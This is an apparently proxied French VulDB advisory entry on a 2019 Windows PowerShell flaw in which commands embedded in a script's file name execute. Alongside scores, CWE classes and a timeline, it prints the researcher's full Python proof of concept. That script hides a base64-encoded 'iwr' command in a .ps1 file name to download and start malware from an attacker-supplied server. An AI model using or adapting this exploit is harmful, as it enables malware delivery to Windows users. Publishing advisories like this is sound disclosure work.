[go: up one dir, main page]
More Web Proxy on the site http://driver.im/

Microsoft Windows PowerShell Semicolon elévation de privilèges

CVSS Score de méta-températureExploit Prix Actuel (≈)Score d'intérêt CTI
5.7$0-$5k0.00

Une vulnérabilité classée critique a été trouvée dans Microsoft Windows (Operating System). Ceci affecte une fonction inconnue du composant PowerShell. A cause de la manipulation dans le cadre de Semicolon mène à une vulnérabilité de classe elévation de privilèges.

La vulnerabilité a été publié en 01/08/2019 par John Page (hyp3rlinx) avec bulletin (Website) (non défini). La notice d'information est disponible en téléchargement sur hyp3rlinx.altervista.org La publication a été coordonnée avec le fabricant. L'attaque peut être initialisée à distance. Aucune forme d'authentification est requise pour l'exploitation. Les details techniques sont inconnus mais une méthode d'exploitation publique est connue.

Un exploit a été developpé par John Page (hyp3rlinx) et a été publié immédiatement après la notice d'information. L'exploit est disponible au téléchargment sur hyp3rlinx.altervista.org. Il est déclaré comme preuve de concept. Cette vulnérabilité a été classée comme 0-day non publique pendant au moins 12 jours. Le code utilisé par l'exploit est:

from base64 import b64encode
import argparse,sys
#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
#Expects hostname/ip-addr of web-server housing the exploit.
#By hyp3rlinx
#Apparition Security
#====================


def parse_args():
    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
    return parser.parse_args()

def main(args):
    PSEmbedFilenameMalwr=""
    if args.ipaddress:
        PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))

def create_file(payload):
    f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
    f.write("Write-Output 'Have a nice day!'")
    f.close()

if __name__=="__main__":
    
    parser = argparse.ArgumentParser()
    PSCmds = main(parse_args())

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)
        
    create_file(PSCmds)
    print "PowerShell - Unsantized Filename Command Execution File created!"
    print "By hyp3rlinx"

La meilleure solution suggérée pour atténuer le problème est Désactiver.

Produitinformation

Taper

Fournisseur

Nom

Licence

CPE 2.3information

CPE 2.2information

Vidéo

CVSSv4information

VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍

CVSSv3information

VulDB Score méta-base: 6.3
VulDB Score de méta-température: 5.7

VulDB Note de base: 6.3
VulDB Note temporaire: 5.7
VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍

CVSSv2information

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VecteurComplexitéAuthentificationConfidentialitéIntégritéDisponibilité
ouvrirouvrirouvrirouvrirouvrirouvrir
ouvrirouvrirouvrirouvrirouvrirouvrir
ouvrirouvrirouvrirouvrirouvrirouvrir

VulDB Note de base: 🔍
VulDB Note temporaire: 🔍
VulDB Fiabilité: 🔍

Exploitinginformation

Classe: Elévation de privilèges
CWE: CWE-94 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍

Localement: Non
Remote: Oui

Disponibilité: 🔍
Accéder: Publique
Statut: Preuve de concept
Auteur: John Page (hyp3rlinx)
Télécharger: 🔍
Prédiction de prix: 🔍
Estimation actuelle des prix: 🔍

0-Dayouvrirouvrirouvrirouvrir
Aujourd'huiouvrirouvrirouvrirouvrir

Renseignements sur les menacesinformation

Intérêt: 🔍
Acteurs actifs: 🔍
Groupes APT actifs: 🔍

Contre-mesuresinformation

Recommandé: Désactiver
Statut: 🔍

Heure 0 jour: 🔍
Délai d'exploitation: 🔍

Chronologieinformation

20/07/2019 🔍
23/07/2019 +3 jours 🔍
01/08/2019 +9 jours 🔍
01/08/2019 +0 jours 🔍
06/08/2019 +5 jours 🔍
21/07/2020 +350 jours 🔍

Sourcesinformation

Fournisseur: microsoft.com
Produit: microsoft.com

Bulletin: hyp3rlinx.altervista.org
Chercheur: John Page (hyp3rlinx)
Statut: Non défini
Coordonné: 🔍
scip Labs: https://www.scip.ch/en/?labs.20161013

Entréeinformation

Établi: 06/08/2019 07:42
Mise à jour: 21/07/2020 11:24
Changements: 06/08/2019 07:42 (53), 21/07/2020 11:24 (2)
Compléter: 🔍
Auteur: hyp3rlinx
Cache ID: 79:2CB:103

Soumettreinformation

Accepté

  • Submit #80: Microsoft Windows PowerShell / Unsanitized Filename Command Execution (par hyp3rlinx)

Dupliqué

Discussion

Aucun commentaire pour l'instant. Langues: fr + en.

Veuillez vous connecter pour commenter.

Do you need the next level of professionalism?

Upgrade your account now!